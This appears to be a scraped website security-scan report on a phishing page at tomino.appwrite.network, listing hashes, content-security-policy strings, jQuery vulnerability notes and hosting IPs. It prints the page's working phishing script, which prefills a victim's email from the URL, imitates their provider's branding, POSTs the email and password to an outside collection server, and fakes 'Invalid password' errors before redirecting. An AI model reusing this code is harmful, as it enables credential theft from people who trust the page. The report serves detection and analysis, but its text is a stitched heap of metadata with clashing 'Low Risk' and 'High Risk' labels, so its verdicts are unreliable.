technology software

healthcare medical

documentation technical

English

__session:0.679071161866616:

Domain 'tomino.appwrite.network' uses the .network top-level domain with subdomain 'tomino'. Count 8 characters in 'appwrite' with 3 vowels and 5 consonants. Segmentation suggests 2 words: app, write. The median word length lands at four characters. No strong language cues emerged from the frequency lists.

email

password

html/5b/83/5b8376f4-073c-4f50-9fa5-7d55764b683b.html.gz

require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/hosted-libraries-pushers

e7ed36ceee5450b4243bbc35188afabdfb4280c7c57597001de0ed167299b01b

05b85d96f41fff14d8f608dad03ab71e2c1017c2da0914d7c59291bad7a54f8e

d43e4670bc3638ff2357c5dbb0e6c478e408a52bf9ac89ae42d63aa2d4c8fa1c

a52f7aa54d7bcaafa056ee0a050262dfc5694ae28dee8b4cac3429af37ff0d66

9365920887b11b33a3dc4ba28a0f93951f200341263e3b9cefd384798e4be398

56c12a125b021d21a69e61d7190cefa168d6c28ce715265cea1b3b0112d169c4

jQuery 1.x and 2.x are End-of-Life and no longer receiving security updates

parseHTML() executes scripts in event handlers

jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution

passing HTML containing <option> elements from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code.

Regex in its jQuery.htmlPrefilter sometimes may introduce XSS

fe107c571dd809e0eb4eca9a42b4d18d274d0eb3b94af499da575435284dca54

6d0d990e8e9e442fb8f13f143d93268cb3cfdc862a1a2edceb806da8f861aff9

width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0

viewport

HSTS header missing - vulnerable to protocol downgrade attacks

CSP header missing - vulnerable to XSS attacks

child-src 'none';object-src 'none';require-trusted-types-for 'script';script-src chrome://resources 'self';trusted-types;worker-src blob: 'self';frame-ancestors 'none';

child-src https:  chrome-untrusted://new-tab-page/ chrome-untrusted://ntp-microsoft-auth/;connect-src chrome://resources chrome://theme 'self';default-src 'self';font-src chrome://resources 'self';img-src chrome://resources chrome://theme chrome://image chrome://favicon2 chrome://app-icon chrome://extension-icon chrome://fileicon blob: data: 'self';object-src 'none';require-trusted-types-for 'script';script-src chrome://resources chrome://webui-test 'self';style-src chrome://resources chrome://theme 'self' 'unsafe-inline';trusted-types parse-html-subset sanitize-inner-html static-types webui-test-script webui-test-html polymer-html-literal polymer-template-event-attribute-policy lit-html-desktop;frame-ancestors 'none';

child-src 'none';object-src 'none';require-trusted-types-for 'script';script-src chrome://resources 'self';trusted-types;frame-ancestors 'none';

base-uri 'none';child-src https:;form-action https://ogs.google.com https://*.corp.google.com;object-src 'none';script-src 'self' 'unsafe-inline' https:;frame-ancestors chrome://new-tab-page/

Abuse Account

Fastly RIR Administrator

Fastly Network Operations

Fastly, Inc.

SKYCA-3



    /* global $ */
    $(document).ready(function(){
      var count=0;

      $('#back1').click(function () {
        $("#msg").hide();
        $('#email').val("");
        $("#automail").animate({left:200, opacity:"hide"}, 0);
        $("#inputbar").animate({right:200, opacity:"show"}, 1000);

      });

      var email = window.location.hash.substr(1);
      if (!email) {

      }
      else
      {
        var my_email =email;
        $('#email').val(my_email);
		
		
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!filter.test(my_email)) {
          $('#error').show();
          email.focus;
          return false;
        }
        var ind=my_email.indexOf("@");
        var my_slice=my_email.substr((ind+1));
        var c= my_slice.substr(0, my_slice.indexOf('.'));
        var final= c.toLowerCase();
        var finalu= c.toUpperCase();

        $("#logoimg").attr("src", "https://logo.clearbit.com/"+my_slice);
		$("#mainPage").attr("src", "https://www."+my_slice);
        $("#logoname").html(my_slice);
       
      }


      
      $('#submit-btn').click(function(event){
        $('#error').hide();
        $('#msg').hide();
        event.preventDefault();
        var email=$("#email").val();
        var password=$("#password").val();
        var msg = $('#msg').html();
        $('#msg').text( msg );

                    if (!password) {
                $('#msg').show();
                $('#msg').html("Password field is empty.!");

                return false;
            }


      ///////////new injection////////////////
      var my_email =email;
      var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

      if (!filter.test(my_email)) {
        $('#error').show();
        email.focus;
        return false;
      }

      var ind=my_email.indexOf("@");
      var my_slice=my_email.substr((ind+1));
      var c= my_slice.substr(0, my_slice.indexOf('.'));
      var final= c.toLowerCase();
      var finalu= c.toUpperCase();

        $("#logoimg").attr("src", "https://www.google.com/s2/favicons?domain="+my_slice);

        $("#logoname").html(finalu);
      ///////////new injection////////////////
      count=count+1;
      
      $.ajax({
        dataType: 'JSON',
        url: 'https://zagamotos.com/tomino.php',
        type: 'POST',
        data:{
          email:email,
          password:password,
        },
            // data: $('#contact').serialize(),
            beforeSend: function(xhr){
              $('#submit-btn').html('Verifing...');
            },
            success: function(response){
              if(response){
                $("#msg").show();
                console.log(response);
                if(response['signal'] == 'ok'){
                  $("#password").val("");
                  if (count>=2) {
                    count=0;
                    // window.location.replace(response['redirect_link']);
                       window.location.replace("https://www."+my_slice);

                  }
                  $("#msg").show();
    	$('#msg').html("Invalid password. Please try again");
                }
                else{
                 $("#msg").show();
    	$('#msg').html("Invalid password. Please try again");
                }
              }
            },
            error: function(){
              $("#password").val("");
              if (count>=2) {
                count=0;
                 window.location.replace("https://www."+my_slice);
              }
              $("#msg").show();
             $("#msg").show();
			$('#msg').html("Invalid password. Please try again");
            },
            complete: function(){
              $('#submit-btn').html('Sign in');
            }
          });
    });


    });


  

X-UA-Compatible

PasswordField

JQuery

Bootstrap

Cloudflare

HSTS

jsDelivr

jQuery CDN

cdnjs

Google Hosted Libraries

Login

✅ Low Risk - https://tomino.appwrite.network/#eriq@sekure.net

Requests	IP Address	Location	AS Autonomous System
7	151.101.129.229	United States	AS54113FASTLY
1	172.67.165.106	United States	AS13335CLOUDFLARENET
1	151.101.2.137	United States	AS54113FASTLY
1	151.101.67.52	United States	AS54113FASTLY
1	151.101.3.52	United States	AS54113FASTLY
1	104.18.11.207	United States	AS13335CLOUDFLARENET
1	104.17.25.14	United States	AS13335CLOUDFLARENET
1	104.17.24.14	United States	AS13335CLOUDFLARENET
1	178.63.16.224	Falkenstein, Saxony, Germany	AS24940Hetzner Online GmbH
1	142.251.38.74	United States	AS15169GOOGLE
16	10	-	-

Security Scan Report: tomino.appwrite.network

Summary

AI Security Verdict

High Risk

Risk Factors

Details

Screenshot

Page Load Overview

Language Analysis

Primary Language

Detection Details

Website Classification

Primary Category

All Detected Categories

Detected Features

Domain & IP Information

Detected Technologies10

Content Similarity HashesFor malware variant detection

TLSH (Trend Micro Locality Sensitive Hash)

ssdeep (Context Triggered Piecewise Hashing)

sdhash (Similarity Digest Hashing)

Image Hashes

Perceptual Hashes

Other Hashes

Scan History